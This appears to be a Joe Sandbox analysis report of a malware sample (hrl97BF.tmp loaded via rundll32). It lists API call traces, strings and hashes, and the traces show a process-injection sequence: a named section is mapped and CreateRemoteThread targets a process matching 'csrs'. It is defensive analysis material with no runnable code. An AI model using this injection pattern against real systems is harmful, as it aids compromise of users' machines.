Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Process$CloseHandle$CodeCreateErrorExitLastMemoryObjectSingleTerminateWaitZero
String ID:
API String ID: 479851863-0
Opcode ID: 3ed73109c565a90064a559c7f12dc2adb11bdd3152a3d3fb5de7734ac646d6f3
Instruction ID: 7f4f93b674e2ec955674b2195e50ebeabb8675a41d593902dc04bf7fa736d272
Opcode Fuzzy Hash: 3ed73109c565a90064a559c7f12dc2adb11bdd3152a3d3fb5de7734ac646d6f3
Instruction Fuzzy Hash: 4411E271900229EBEB01EFE1CD88ADE7FB9EF08791F104011EA05A6169D6319A54DBA1

Function 10001606 Relevance: 9.0, APIs: 6, Instructions: 43
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 1000160C
GetTickCount.KERNEL32 ref: 1000161C
WaitForSingleObject.KERNEL32(00001388,?,?,100019A9), ref: 10001634
GetTickCount.KERNEL32 ref: 1000163D
GetLogicalDrives.KERNEL32 ref: 10001650
WaitForSingleObject.KERNEL32(00001388,?,?,100019A9), ref: 10001663

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CountDrivesLogicalObjectSingleTickWait
String ID:
API String ID: 42545375-0
Opcode ID: 2f4c3f1a3b6afdf214a9756a201ba7ea0d71bd53a76343712a0b17754985ecb0
Instruction ID: 3f6e6b7f54fa11ca4b0782ed1666a21edfd725203009cfb413e51542acf73e8d
Opcode Fuzzy Hash: 2f4c3f1a3b6afdf214a9756a201ba7ea0d71bd53a76343712a0b17754985ecb0
Instruction Fuzzy Hash: 56F0F6319083259FF700EF30ECC886FBBEDEB802D5B25492FF500C2158C632AC049A61

Function 10001338 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1000134F
PathFindFileNameW.SHLWAPI(?), ref: 1000135C
PathFindExtensionW.SHLWAPI(00000000), ref: 10001377
lstrcmpiW.KERNEL32(00000000,.TMP), ref: 10001387

Strings

.TMP, xrefs: 10001381

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileFindNamePath$ExtensionModulelstrcmpi
String ID: .TMP
API String ID: 597247504-614523329
Opcode ID: b46ec49155dca4e4acb181e031907566a4278cfaff318f8430b02358fa9435f5
Instruction ID: 1fd35f4ed13ad4ccd143400fde8a975121882a3ba8c08806c051296bf98cdfa8
Opcode Fuzzy Hash: b46ec49155dca4e4acb181e031907566a4278cfaff318f8430b02358fa9435f5
Instruction Fuzzy Hash: 43F03760A003159AFB50AF608D4DED737FCEB003C5F028555E559D74AAEBF4CAC9CA60

Function 10001134 Relevance: 7.5, APIs: 5, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000065,0000000A,00000001,?,10001A61), ref: 10001142
SizeofResource.KERNEL32(00000000,?,?,10001A61), ref: 10001156
LoadResource.KERNEL32(00000000,?,?,10001A61), ref: 10001165
LockResource.KERNEL32(00000000,?,?,10001A61), ref: 10001174
lstrcpynA.KERNEL32(10003220,00000000,00000020,?,?,10001A61), ref: 10001186

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindLoadLockSizeoflstrcpyn
String ID:
API String ID: 3315616855-0
Opcode ID: 177b28840c69342d611e61a706d029771a620c0a2154c7c66a29e914538ba66c
Instruction ID: 8471c72c1caef8166e4ab4b94a4b144f79c53e762d3decfbeebc5ecea59f4515
Opcode Fuzzy Hash: 177b28840c69342d611e61a706d029771a620c0a2154c7c66a29e914538ba66c
Instruction Fuzzy Hash: 99F01C35A01334BBFB261BA59CCCF973FADEB497D5F01C126FA05D21A9DA21C815C660

Analysis Process: hrl97BF.tmpPID: 5732, Parent PID: 7000COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.6%
Total number of Nodes:	1579
Total number of Limit Nodes:	14

Executed Functions

Function 004763EE Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?), ref: 0047647F
GetVersion.KERNEL32 ref: 004764C1
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 004764E9
CloseHandle.KERNEL32(?), ref: 0047656E

Strings

\BaseNamedObjects\vdqtVt, xrefs: 004766C9
\BaseNamedObjects\vdqtVt, xrefs: 004766CA, 004766ED, 004766FB
csrs, xrefs: 004767ED

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\vdqtVt$\BaseNamedObjects\vdqtVt$csrs
API String ID: 3017432202-1320403132
Opcode ID: 8b4b9989ffec3ff2179909fafd33efe618d113b3788b376b09cf37aa3b332c1b
Instruction ID: b2214ec55225f7a82e0de8efb69309d9a098271a0192643b3b6eeede7f5d5e80
Opcode Fuzzy Hash: 8b4b9989ffec3ff2179909fafd33efe618d113b3788b376b09cf37aa3b332c1b
Instruction Fuzzy Hash: 8CB1DD31504609FFEB259F24C84ABEA3BAEEF44714F11802AE90D9E181C7F89F45DB19

Function 006F042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 006F04BE
GetVersion.KERNEL32 ref: 006F0500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 006F0528
CloseHandle.KERNELBASE(?), ref: 006F05AD

Strings

csrs, xrefs: 006F082C
\BaseNamedObjects\vdqtVt, xrefs: 006F0708
\BaseNamedObjects\vdqtVt, xrefs: 006F0709, 006F072C, 006F073A

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\vdqtVt$\BaseNamedObjects\vdqtVt$csrs
API String ID: 3017432202-1320403132
Opcode ID: 8b4b9989ffec3ff2179909fafd33efe618d113b3788b376b09cf37aa3b332c1b
Instruction ID: b7e80f6b41d3972bc84599bf2e04bb2586e44e29e50e8907319ca1a3aa2665a7
Opcode Fuzzy Hash: 8b4b9989ffec3ff2179909fafd33efe618d113b3788b376b09cf37aa3b332c1b
Instruction Fuzzy Hash: 52B18E71505249FFFB21AF24C80ABFA3BAEEF45311F104128EA099E182C7F09F558B59

Function 004765B3 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(?), ref: 0047656E
GetModuleHandleA.KERNEL32(004765AD), ref: 004765B3
lstrcpyW.KERNEL32(\BaseNamedObjects\vdqtVt,\BaseNamedObjects\vdqtVt,?,?,?,?), ref: 004766CB
lstrcpyW.KERNEL32(\BaseNamedObjects\vdqtVt,?), ref: 004766EE
lstrcatW.KERNEL32(\BaseNamedObjects\vdqtVt,\vdqtVt), ref: 004766FC
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 0047672C
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00476747
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 0047678A
Process32First.KERNEL32 ref: 0047679D
Process32Next.KERNEL32 ref: 004767AE
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 004767C6
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00476803
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0047681E
CloseHandle.KERNEL32 ref: 0047682D

Strings

\BaseNamedObjects\vdqtVt, xrefs: 004766C9
\BaseNamedObjects\vdqtVt, xrefs: 004766CA, 004766ED, 004766FB
csrs, xrefs: 004767ED

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\vdqtVt$\BaseNamedObjects\vdqtVt$csrs
API String ID: 1545766225-1320403132
Opcode ID: c9f9a788b574020a046f2f8eb09419938f2a217e05aeedc795e489f146aaeb0c
Instruction ID: 356e14d9aa96dc34d10faba124a34068aed7816a61563f236a7792669a3c4cbc
Opcode Fuzzy Hash: c9f9a788b574020a046f2f8eb09419938f2a217e05aeedc795e489f146aaeb0c
Instruction Fuzzy Hash: 9C71BB31104605FFEB25AF10C84ABEA3B6EEF44758F12802AE80D9E191C7B99F05DA5D

Function 006F05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 006F05AD
GetModuleHandleA.KERNEL32(006F05EC), ref: 006F05F2
lstrcpyW.KERNEL32(\BaseNamedObjects\vdqtVt,\BaseNamedObjects\vdqtVt,?,?,?,?), ref: 006F070A
lstrcpyW.KERNEL32(\BaseNamedObjects\vdqtVt,?), ref: 006F072D
lstrcatW.KERNEL32(\BaseNamedObjects\vdqtVt,\vdqtVt), ref: 006F073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 006F076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 006F0786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F07C9
Process32First.KERNEL32 ref: 006F07DC
Process32Next.KERNEL32 ref: 006F07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 006F0842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F085D
CloseHandle.KERNEL32 ref: 006F086C

Strings

csrs, xrefs: 006F082C
\BaseNamedObjects\vdqtVt, xrefs: 006F0708
\BaseNamedObjects\vdqtVt, xrefs: 006F0709, 006F072C, 006F073A

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\vdqtVt$\BaseNamedObjects\vdqtVt$csrs
API String ID: 1545766225-1320403132
Opcode ID: c9f9a788b574020a046f2f8eb09419938f2a217e05aeedc795e489f146aaeb0c
Instruction ID: 4e9b729cfaeb4f12e6412b01c5e0653b5e29cd41d3bf7b6abd92d35aaf52a3a7
Opcode Fuzzy Hash: c9f9a788b574020a046f2f8eb09419938f2a217e05aeedc795e489f146aaeb0c
Instruction Fuzzy Hash: 5D718B32505209FFEB21AF14CC4AABE3B6EEF45311F104068EE099E192C7F59F459B69

Function 006F116F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 350
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(006F1162,006F0796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F116F

Part of subcall function 006F1196: GetProcAddress.KERNEL32(00000000,006F1180), ref: 006F1197

Strings

\vdqtVt, xrefs: 006F11C6

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: \vdqtVt
API String ID: 2574300362-4079102830
Opcode ID: d8ba3b69591c402f79a20eb3bdefb2c50bddf4c0cdf9a81ca726f874e9dd14bc
Instruction ID: 4878d350a6e4e9447f634a2a235d3ecd2eef6ff9bd0175d41d1164e66517ee44
Opcode Fuzzy Hash: d8ba3b69591c402f79a20eb3bdefb2c50bddf4c0cdf9a81ca726f874e9dd14bc
Instruction Fuzzy Hash: 40A1A923C58689DBC735AAB488954FE7FA3EB137D1708018ED7A18FB42C6A1DE478341

Function 0047846F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
stringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\vdqtVt), ref: 0047847B
lstrlenW.KERNEL32(?), ref: 00478482
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 004784D7

Strings

\BaseNamedObjects\vdqtVt, xrefs: 00478479

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\vdqtVt
API String ID: 2597515329-3506632634
Opcode ID: 2f6cf96f82f790236297447ba5dc02a169e9e9b983f3ded4cb8cf908fcd29746
Instruction ID: f9603c71b26aefd643ab68b75b204eefc2f9b5c1b6412fedc899a5374ac3e62e
Opcode Fuzzy Hash: 2f6cf96f82f790236297447ba5dc02a169e9e9b983f3ded4cb8cf908fcd29746
Instruction Fuzzy Hash: B80181B0781344BAF7309B29CC4BF5B7929DF81B50F548558F608AE1C5DAB89A0483A9

Function 006F252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 006F255E

Strings

\BaseNamedObjects\vdqtVt, xrefs: 006F254B

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\vdqtVt
API String ID: 1950954290-3506632634
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 006F2574 Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F252F: NtOpenSection.NTDLL(?,0000000E), ref: 006F255E

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 006F25A4
CloseHandle.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,006F0815), ref: 006F25AC

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

